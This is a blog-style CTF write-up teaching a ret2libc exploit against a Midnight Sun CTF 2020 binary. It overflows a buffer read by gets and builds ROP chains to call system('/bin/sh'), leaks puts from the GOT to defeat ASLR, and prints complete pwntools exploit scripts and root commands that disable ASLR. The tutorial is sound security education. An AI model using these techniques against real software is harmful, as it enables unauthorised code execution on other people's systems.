Binary Exploitation: Exploiting Ret2Libc

sharkmoos
8 min read · Feb 25, 2021

A ret2libc (return-to-libc) attack lets an attacker take control of a target through a vulnerable binary without injecting any shellcode. It is a way of exploiting binaries that have the NX (non-executable) stack protection enabled. We will first carry out a ret2libc attack with ASLR disabled to show the method, then re-enable ASLR and adapt our exploit to overcome this protection.

Our example binary is from the Midnight Sun CTF 2020 qualifier competition.

Head over to my website for better formatted code snippets, and the binary if you want to follow along.

To confirm the security measures, we can use checksec. This confirms that the binary has an NX stack and partial RELRO (the GOT entries for libc functions stay writable and are filled in lazily, the first time each function is called).

Checksec Output

Running the binary shows this:

Running the Binary

Since we will start by exploiting the binary without ASLR, let's disable ASLR on our system (this needs root).

echo 0 > /proc/sys/kernel/randomize_va_space

Let's decompile the binary with IDA. Decompiling the main function reveals that gets is used to read the user input, which is saved to var_40. gets never checks that the input fits within the buffer, so we can carry out a buffer overflow attack.

Main function from IDA Free

Before starting to write the exploit, we should note the location of our libc library that the binary relies on.

> ldd pwn1

linux-vdso.so.1 (0x00007ffff7fca000)

libc.so.6 => /usr/lib/libc.so.6 (0x00007ffff7dce000)

/lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007ffff7fcc000)

Binary Exploitation with Pwntools

For developing the exploit, we will use pwntools. Pwntools is an exploit development library for Python which significantly simplifies the exploit process. We can quickly write a skeleton of the exploit.

#!/usr/bin/python3
from pwn import *

p = process('./pwn1') # Run binary
input("Attach GDB and press enter") # Let user attach to gdb
binary = ELF('./pwn1') # Load the binary into pwntools
context.binary = binary # Configure pwntools settings to match binary

libc = ELF('/usr/lib/libc.so.6') # Location of our libc library
rop = ROP(binary) # Helps find gadgets and build ROP chains

p.recvuntil(b"buffer:") # Stop when program outputs this string
p.interactive() # Allow user interaction

In gdb we enter a string of 100 characters into the program. This causes a segmentation fault, meaning we have overflowed the buffer and overwritten saved data beyond it. The offset to that data must therefore be less than 100 bytes.

Gef view of registers

We can identify the offset by using the pattern create function from gef. The pattern is a string of characters in which, on a 64-bit target, no group of 8 consecutive characters repeats. This allows us to inspect the registers and the stack after the crash and identify how many bytes of input came before the value we see there.

gef➤ pattern create 80

[+] Generating a pattern of 80 bytes
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaa

We can then rerun the binary and enter the new string.

Found offset in Gef
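As a rough illustration of how the offset falls out of the pattern, the sketch below uses only the Python standard library. It assumes the 8 bytes at the top of the stack at the crash are jaaaaaaa. That value is an assumption made for this example (it is the group that begins 72 bytes into the pattern above), and the variable names are illustrative.

```python
# The 80-byte pattern printed by gef above, split into 8-byte groups.
pattern = (
    b"aaaaaaaa" b"baaaaaaa" b"caaaaaaa" b"daaaaaaa" b"eaaaaaaa"
    b"faaaaaaa" b"gaaaaaaa" b"haaaaaaa" b"iaaaaaaa" b"jaaaaaaa"
)

# Assumed crash value: the 8 bytes found at $rsp when ret faults.
crash_bytes = b"jaaaaaaa"

# No 8-byte window repeats, so its position in the pattern is the offset.
offset = pattern.find(crash_bytes)
print(offset)

# A debugger displays those bytes as a little-endian 64-bit integer.
as_register = int.from_bytes(crash_bytes, "little")
print(hex(as_register))
```

Because x86-64 is little-endian, the first byte of the group ends up as the least significant byte of the value a debugger prints, which is why the hex form looks reversed compared with the string.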

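The architecture is little-endian, so once the bytes are read in the right order the offset comes out as 72. This matches the decompilation: the buffer at var_40 sits 0x40 (64) bytes below the saved base pointer, and the saved $rbp takes another 8 bytes. We need 72 bytes of data to reach the saved return address, which is what $rsp points to when ret executes. The 8 bytes after this will be loaded into the instruction pointer ($rip).

We should also make a note of the address of the ret instruction, as this will help us debug our exploit. We can now craft a payload to verify that we have control over the instruction pointer.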
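To make the byte layout concrete, here is a minimal sketch of such a test payload built with the standard library's struct module rather than pwntools. The helper name build_test_payload is hypothetical; 72 is the offset found above and 0xdeadbeef is just a recognisable placeholder address.

```python
import struct

OFFSET = 72  # bytes of padding before the saved return address


def build_test_payload(ret_addr: int) -> bytes:
    """Padding followed by one 64-bit little-endian return address."""
    return b"A" * OFFSET + struct.pack("<Q", ret_addr)


payload = build_test_payload(0xdeadbeef)
print(len(payload))
print(payload[OFFSET:].hex())
```

The last 8 bytes are the ones ret pops into $rip, so seeing 0xdeadbeef there in gdb would confirm the offset.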

Our updated exploit looks like this:

#!/usr/bin/python3

from pwn import *

p = process('./pwn1')

input("Attach GDB and press enter")

binary = ELF('./pwn1')
context.binary = binary
rop = ROP(binary)
libc = ELF('/usr/lib/libc.so.6')
p.recvuntil(b"buffer:")

OFFSET = 72 # Bytes of junk needed to reach the saved return address

rop.raw(b"A" * OFFSET)
rop.raw(0xdeadbeef) # Placeholder return address

p.sendline(rop.chain()) # Send our ROP chain
p.interactive()

Analysing the stack in gdb, we can confirm that we have overwritten the saved return address, and therefore $rip, with our own value.

Controlled instruction pointer

We can now move on to trying to get a shell. Remember, the NX stack is enabled, so we cannot execute data (such as shellcode) on the stack. We must use return-oriented programming (ROP).

The libc library used by the binary contains the function system. We can leverage the copy of libc loaded in memory to redirect the control flow and call system("/bin/sh"), which spawns a shell.

To call system with our argument, we need to put a pointer to the string "/bin/sh" into $rdi, the register that holds the first argument under the x86-64 System V calling convention. libc itself contains this string, so we can use pwntools to look up a pointer to it with this code snippet.

next(libc.search(b'/bin/sh'))

Next, we need to find a gadget that can pop data from the stack into $rdi and ends with a return. We can use the ropper function in Gef to find this gadget.

Found Gadget

We also need the base address of libc in the binary's virtual memory. With ASLR disabled, we can use the address from the ldd output we noted earlier.

We also need to get a pointer to system. We can use pwntools to find one in libc.

libc.symbols['system']

So, in the abstract, our payload looks like this:

junk "A"s * 72 + pop rdi; ret gadget + ptr to "/bin/sh" + ptr to system
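The same layout can be sketched in plain Python. The gadget address 0x400783 and the libc base are the values used in this article; BINSH_OFFSET and SYSTEM_OFFSET are made-up placeholders, because the real offsets depend on the libc build and are exactly what libc.search and libc.symbols look up.

```python
import struct

OFFSET = 72
POP_RDI_RET = 0x400783          # pop rdi; ret gadget used in this article
LIBC_BASE = 0x00007ffff7dce000  # from the ldd output, ASLR disabled
BINSH_OFFSET = 0x18A000         # placeholder, NOT a real offset
SYSTEM_OFFSET = 0x49000         # placeholder, NOT a real offset


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)


chain = (
    b"A" * OFFSET                     # fill the buffer and saved rbp
    + p64(POP_RDI_RET)                # ret jumps here first
    + p64(LIBC_BASE + BINSH_OFFSET)   # popped into rdi by the gadget
    + p64(LIBC_BASE + SYSTEM_OFFSET)  # the gadget's ret jumps to system
)
print(len(chain))
```

Each 8-byte slot is consumed in order: the function's ret takes the gadget address, pop rdi takes the string pointer, and the gadget's own ret takes the address of system.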

Our exploit code now looks like this:

#!/usr/bin/python3

from pwn import *

p = process('./pwn1') # Set a breakpoint at the ret instruction

input("Attach GDB and press enter")

binary = ELF('./pwn1')
context.binary = binary
rop = ROP(binary)
libc = ELF('/usr/lib/libc.so.6')
p.recvuntil(b"buffer:")

OFFSET = 72

libc.address = 0x00007ffff7dce000 # Taken from the ldd command
rop.raw(b"A" * OFFSET)
rop.raw(0x400783) # Location of pop_rdi gadget
rop.raw(next(libc.search(b'/bin/sh'))) # Pointer to "/bin/sh" in libc
rop.raw(libc.symbols['system']) # Address of system in libc

p.sendline(rop.chain()) # Send our ROP chain
p.interactive()

We successfully got our shell! This means we managed to redirect the execution flow to system("/bin/sh").

Got a shell

With ASLR Enabled

Let's re-enable ASLR.

echo 2 > /proc/sys/kernel/randomize_va_space

When we try to run the exploit now, it fails.

This is because the base address of libc, and with it the addresses of the string and functions we rely on, is randomised each time the binary is run. We can visualise this by running ldd on the binary a few times.

We can see that the location of our libraries keeps changing.

We need a way to determine the address of system at runtime. If we can leak a pointer to any function in libc, and we have a copy of the system's libc binary, we can calculate the shared library's base address. Every function sits at a constant offset from the start of the shared library, so we can subtract that offset from the leaked pointer to get the base address of libc.
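As a worked example of that subtraction, the sketch below derives the offset of puts from two numbers that appear in this article: the libc base from ldd and the address of puts shown by gdb. It assumes both come from the same ASLR-disabled mapping. The leaked value is hypothetical, standing in for whatever an ASLR-enabled run would print.

```python
# From the ASLR-disabled session in this article (assumed same mapping).
LIBC_BASE_NO_ASLR = 0x00007ffff7dce000  # ldd output
PUTS_NO_ASLR = 0x00007ffff7e44d10       # puts as seen in gdb

# Offset of puts inside libc; constant for this particular libc build.
PUTS_OFFSET = PUTS_NO_ASLR - LIBC_BASE_NO_ASLR


def libc_base_from_leak(leaked_puts: int) -> int:
    """Recover the randomised libc base from a leaked puts pointer."""
    return leaked_puts - PUTS_OFFSET


# Hypothetical pointer leaked during an ASLR-enabled run.
leaked = 0x00007f3a5c476d10
base = libc_base_from_leak(leaked)
print(hex(PUTS_OFFSET))
print(hex(base))
```

A quick sanity check on any computed base is that it is page aligned, meaning its low 12 bits are zero. If it is not, the leak was probably parsed incorrectly or the wrong libc file is being used.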

This sounds complicated, but pwntools can help us.

We will call the puts function to print a pointer to the terminal. We can call puts, but not system, because the binary was not compiled as a position-independent executable, so its procedure linkage table (PLT) sits at a fixed address even with ASLR enabled. Every libc function the binary imports gets a PLT stub at a static address, and each stub jumps through a pointer stored in a lookup table called the global offset table (GOT). The binary imports puts, so puts has a PLT entry; it never uses system, so system does not. This is why we can call puts directly but not system.

To summarise, the PLT stub is what the binary calls to reach a shared library function, and the GOT holds the pointer to the function itself.

We can see what the puts function looks like before the lazy binding has occurred by disassembling it before it is called.

gef➤ starti
gef➤ b gets
gef➤ disas puts

Dump of assembler code for function puts@plt:
0x0000000000400550 <+0>: jmp QWORD PTR [rip+0x201ac2] # 0x602018 <puts@got.plt>
0x0000000000400556 <+6>: push 0x0
0x000000000040055b <+11>: jmp 0x400540
End of assembler dump.

As we can see, it does not contain the full function, only a stub that refers to another location. This is the PLT stub for puts. The first instruction in the stub is a jump through a GOT entry. We can look at the value stored in that entry.

gef➤ x/qx 0x602018
0x602018 <puts@got.plt>: 0x00400556

We can see that our GOT entry points to the second instruction in the puts PLT stub. However, if we let the program run into the breakpoint, and then see the value, we can see it has changed.

gef➤ c
gef➤ x/qx 0x602018
0x602018 <puts@got.plt>: 0xf7e44d10

The GOT entry has been populated with a pointer to puts in libc (the output above shows only the low 32 bits of the full address, 0x00007ffff7e44d10). If we disassemble puts now, we see the whole function rather than the PLT stub.

gef➤ disas puts
Dump of assembler code for function puts:
0x00007ffff7e44d10 <+0>: endbr64
0x00007ffff7e44d14 <+4>: push r14
0x00007ffff7e44d16 <+6>: push r13
0x00007ffff7e44d18 <+8>: push r12
0x00007ffff7e44d1a <+10>: mov r12,rdi
0x00007ffff7e44d1d <+13>: push rbp
[…]
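The behaviour seen in this gdb session can be mimicked with a toy model. This is only a simplified illustration of lazy binding, not how the dynamic linker is implemented; the function names are hypothetical, and the addresses are the ones gdb reported above.

```python
PUTS_PLT = 0x400550            # start of the puts PLT stub
PUTS_IN_LIBC = 0x7ffff7e44d10  # resolved address of puts in libc

# Before the first call, the GOT entry points back into the stub (+6).
got = {"puts": PUTS_PLT + 6}


def resolve(name: str) -> int:
    """Stand-in for the dynamic linker's symbol lookup."""
    return {"puts": PUTS_IN_LIBC}[name]


def call_through_plt(name: str) -> int:
    """Return the address execution finally lands on for this call."""
    if got[name] == PUTS_PLT + 6:
        # First call: resolve the symbol and patch the GOT entry.
        got[name] = resolve(name)
    return got[name]


before = got["puts"]
first_target = call_through_plt("puts")
after = got["puts"]
print(hex(before), hex(after))
```

After the first call the GOT entry holds the libc address, so every later call through the stub jumps straight to puts. That patched value is the pointer worth leaking.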

We know that we need to leak the pointer stored in the GOT entry for puts. We also know that the entry is only populated after puts has been called, because of lazy binding. If we leaked the GOT entry before the function had been called, we would get a pointer to the function's PLT stub rather than to the function in libc, and we cannot calculate the libc base from the PLT stub.

By the time our payload runs, the program has already called puts, so the GOT entry is populated. The remaining problem is that the leak is only useful if we can send a second payload before the binary exits. We can solve this by adding another pointer to the end of our exploit payload that points to the start of the main function.

To summarise, we will attack like this:

1. Send our first payload, which overwrites the saved return pointer to call puts (via the PLT) and print the GOT entry for puts.

2. Redirect the execution flow back to the start of the main function.

3. Calculate the base address of libc from the leaked pointer.

4. Create a second payload, with the correct addresses for /bin/sh and system.

5. Launch the second payload on the second pass through the main function.
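The first two steps, and the parsing needed for the third, can be sketched without pwntools as follows. All four addresses appear elsewhere in this article; the layout is an approximation of the chain pwntools builds rather than its exact output, the leaked pointer is hypothetical, and parse_leak is an illustrative helper name.

```python
import struct

OFFSET = 72
POP_RDI_RET = 0x400783  # pop rdi; ret gadget
PUTS_GOT = 0x602018     # puts@got.plt
PUTS_PLT = 0x400550     # puts@plt
MAIN = 0x400698         # start of main


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)


# Steps 1 and 2: call puts(puts@got), then return into main.
stage1 = (
    b"A" * OFFSET + p64(POP_RDI_RET) + p64(PUTS_GOT)
    + p64(PUTS_PLT) + p64(MAIN)
)


def parse_leak(line: bytes) -> int:
    """puts stops at the first NUL byte, so pad back to 8 bytes."""
    raw = line.rstrip(b"\n")
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")


# Simulated output line for a hypothetical leaked pointer.
simulated = p64(0x7f3a5c476d10).rstrip(b"\x00") + b"\n"
leak = parse_leak(simulated)
print(hex(leak))
```

User-space addresses on x86-64 have their top two bytes set to zero, so puts prints only six bytes followed by a newline. This is why the leak has to be padded before it is converted to an integer.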

Final Exploit

#!/usr/bin/python3

from pwn import *

p = process('./pwn1') # Set a breakpoint at the ret instruction
input("Attach GDB and press enter")

binary = ELF('./pwn1')
context.binary = binary
rop = ROP(binary)

libc = ELF('/usr/lib/libc.so.6')
OFFSET = 72 # Offset to the saved return address

# Stage 1: leak the resolved address of puts, then return to main
rop.raw(b"A" * OFFSET)
rop.puts(binary.got['puts'])

rop.call(0x400698) # Address of function main

print(rop.dump())

p.recvuntil(b"buffer:")
p.sendline(rop.chain())
leakedPuts = p.recvline()[:8].strip()
print("Leaked puts@GLIBC: {}".format(leakedPuts))

leakedPuts = int.from_bytes(leakedPuts, byteorder='little')
libc.address = leakedPuts - libc.symbols['puts'] # Rebase libc

# Stage 2: call system("/bin/sh") using the rebased libc
pop_rdi = p64(0x400783) # Location of pop_rdi gadget
sh = p64(next(libc.search(b'/bin/sh'))) # Pointer to "/bin/sh"
system = p64(libc.symbols['system'])
padding = (b"A" * OFFSET)

p.recvuntil(b"buffer:")

payload = padding + pop_rdi + sh + system
print(sh)
p.sendline(payload) # Send the second payload
p.interactive()

That’s it for this writeup. To recap, we exploited a binary with an NX stack that was vulnerable to ret2libc, first without ASLR. Then we re-enabled ASLR and executed a ret2plt attack to leak the relevant addresses, loop back to the main function and get a shell using a second payload.

I hope this article is understandable. I may write more binary exploitation in the future.


sharkmoos

Novice Cyber Security Enthusiast. I like sharing what I’ve learnt